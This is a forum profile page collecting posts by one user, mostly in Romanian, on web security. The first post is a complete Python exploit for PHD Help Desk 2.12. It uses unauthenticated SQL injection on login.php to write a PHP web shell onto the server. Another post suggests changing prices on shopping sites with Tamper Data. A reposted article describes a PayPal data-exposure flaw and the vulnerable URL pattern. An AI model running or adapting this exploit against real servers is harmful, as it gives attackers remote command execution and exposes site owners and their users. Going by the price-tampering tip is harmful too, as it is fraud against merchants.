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Everything posted by akkiliON

  1. # Exploit Title: PHD Help Desk 2.12 SQLi # Date: 05/24/2013 # Exploit Author: drone (@dronesec) # More information: http://forelsec.blogspot.com/2013/06/phd-help-desk-212-sqli-and-xss.html # Vendor Homepage: http://www.p-hd.com.ar/ # Software Link: http://downloads.sourceforge.net/project/phd/phd_released/phd%202.12/phd_2_12.zip # Version: 2.12 # Tested on: Ubuntu 12.04 (apparmor disabled) """ This app is so full of SQLi & XSS; if you're looking for practice with real web apps, this is a good place to go. You don't need auth for this. """ from argparse import ArgumentParser import string import random import urllib, urllib2 import sys def run(options): print '[!] Dropping web shell on %s...'%(options.ip) shell = ''.join(random.choice(string.ascii_lowercase+string.digits) for x in range(5)) # <? php system($_GET["rr"]); ?> data = urllib.urlencode({'operador''\' UNION SELECT 0x3c3f7068702073797374656d28245f4745545b227272225d293b3f3e' ',null,null,null,null,null,null,null,null,null,null,null,null,null INTO OUTFILE' ' \'{0}/{1}.php'.format(options.path,shell)), 'contrasenia':'pass', 'submit':'Enter', 'captcha':''}) urllib2.urlopen('http://{0}{1}/login.php'.format(options.ip, options.rootp), data) print '[!] Shell dropped. http://%s%s/%s.php?rr=ls'%(options.ip,options.rootp,shell) def parse(): parser = ArgumentParser() parser.add_argument('-i',help='server address',action='store',dest='ip') parser.add_argument('-p',help='path to login.php (/phd_2_12)',action='store', default='/phd_2_12', dest='rootp') parser.add_argument('-w',help='writable web path (/var/www/phd_2_12) for shell', default='/var/www/phd_2_12/', action='store', dest='path') options = parser.parse_args() if not options.ip: parser.print_help() sys.exit(1) options.path = options.path if options.path[-1] != '/' else options.path[:-1] options.rootp = options.rootp if options.path[-1] != '/' else options.path[:-1] return options if __name__=="__main__": run(parse())
  2. Iti respect decizia pe care ai luat-o ! Bravo !
  3. OFF: La unele site-uri poti schimba pretul folosind doar Tamper Data ! Aceasta metoda este veche ! Poate careva nu stie de aici si m-am gandit sa va anunt.
  4. Off: vreau si eu emailuri de danarmeca, urukaina Nu puteam sa ma abtin )
  5. If you're making a lot of money and you want to keep records of your transactions, then using Paypal's Reporting system you can effectively measure and manage your business. Nir Goldshlager, founder of Breaksec and Security Researcher reported critical flaws in Paypal Reporting system that allowed him to steal private data of any PayPal account. Exploiting the vulnerabilities he discovered, allowed him to access the financial information of any PayPal user including victim's shipping address Email addresses, Phone Number, Item name, Item Amount, Full name, Transaction ID, Invoice ID, Transaction, Subject, Account ID, Paypal Reference ID etc. He found that PayPal is using the Actuate Iportal Application (a third party app) to display customer reports, so Nir downloaded the trial version of this app for testing purpose from its official website. After going deeply through the source code of trial version, Nir located a file named getfolderitems.do that allowed him to access user's data without credentials. Nir found that, Getfolderitems.do file having an ID parameter of 7-8 numeric characters which can be manipulated get the secret token id of respective user with same ID. i.e getfolderitems.do?id=392302. i.e URL : https://business.paypal.com/acweb/getfolderitems.do?folder=/users/tokenidofthevictim/ , where tokenidofthevictim is the secret token of the victim. This flaw that has been exploited for demo purpose only, is now fixed by Security team of Paypal. Hacking PayPal accounts to steal user Private data - TheHackerNews
  6. Google will release details of any zero-day flaws it finds in software, if the affected vendor fails to issue a patch or disclose the issue itself within a week. Now, Google is shortening that timeline a good bit to just 7 days. ”Based on our experience...we believe that more urgent action within 7 days is appropriate for critical vulnerabilities under active exploitation”, wrote Google Security engineers Chris Evans and Drew Hintz in a blog spot. "The reason for this special designation is that each day an actively exploited vulnerability remains undisclosed to the public and unpatched, more computers will be compromised." Right now, companies use either responsible disclosure or full disclosure when dealing with vulnerabilities. Responsible disclosure allows a company as much time as they want to patch an exploit, and the details surrounding the bug aren't revealed to the public until a patch is issued. Full disclosure, on the other hand, means the company and the public are given information about the flaw at the same time. Many zero-day vulnerabilities are used against specific groups of individuals in targeted attacks that are often more serious than broader ones, the Google security engineers said. However, Google realizes that seven days is not enough time to patch all vulnerabilities. Even if a company can't address the bug in seven days, the researchers could still publish the details of the software flaw after a week so that the public can protect itself. Large software vendors like Microsoft, Adobe and Oracle, whose products are a frequent target of zero-day attacks, have experience in dealing with such incidents and have processes in place that allow them to respond in a timely manner most of the time. However, smaller vendors might be less prepared to deal with zero-day vulnerabilities and alert their customers. Earlier this month, Google security engineer Tavis Ormandy exposed a Microsoft flaw on Full Disclosure. The Microsoft vulnerability, which was in the Windows kernel driver Win32k.sys, was featured in a Full Disclosure mailing list on May 17. Ormandy also insulted Microsoft on Full Disclosure, saying "As far as I can tell, this code is pre-NT (20+ years) old, so remember to thank the SDL for solving security and reminding us that old code doesn't need to be reviewed ;-).." The same deadline will apply to those bug hunters who discover vulnerabilities in Google products too, they said. Google sets 7 Day deadline for vulnerability disclosure - TheHackerNews
  7. Nu e nici un pusti Am vazut profilul lui de pe un site de socializare !
  8. Deci sunt lamurit cu cei de la Paypal Nu are rost sa cauti nimic la ei.. Muieeeee Paypal.
  9. Deci ai mai primit raspuns de la ei ca or reparat problema ?
  10. eBay au XSS-uri multe ! Am mai gasit un XSS Persistent !
  11. akkiliON


    Uite aici pagina ! Du-te jos de tot si o sa vezi un formular ! Bafta ! Report a Security Vulnerability @dirtycash Nu acolo trebuie sa raportezi vulnerabilitatile !
  12. Eu as zice sa iti instalezi Kali Linux ! E mai stabil decat Back Track ! Acuma faci cum vrei ! Parerea mea
  13. akkiliON

    XSS Yahoo

    Ala nu e parametrul T= !
  14. akkiliON

    XSS Yahoo

    Nu prea cred ca se poate fura parametrul HttpOnly T=
  15. Daca tot ai gasit SQLi posteaza si sintaxa ... macar scoate versiunea sau ceva (nu neaparat sa pui username-ul si parola de la admin) ! Ai pun un ' si gata ! Ai facut o treaba buna !
  16. Nu e nici un XSS Nu stiu ce vezi tu acolo !
  17. Serios ? Sigur acest tutorial e scris de ei !
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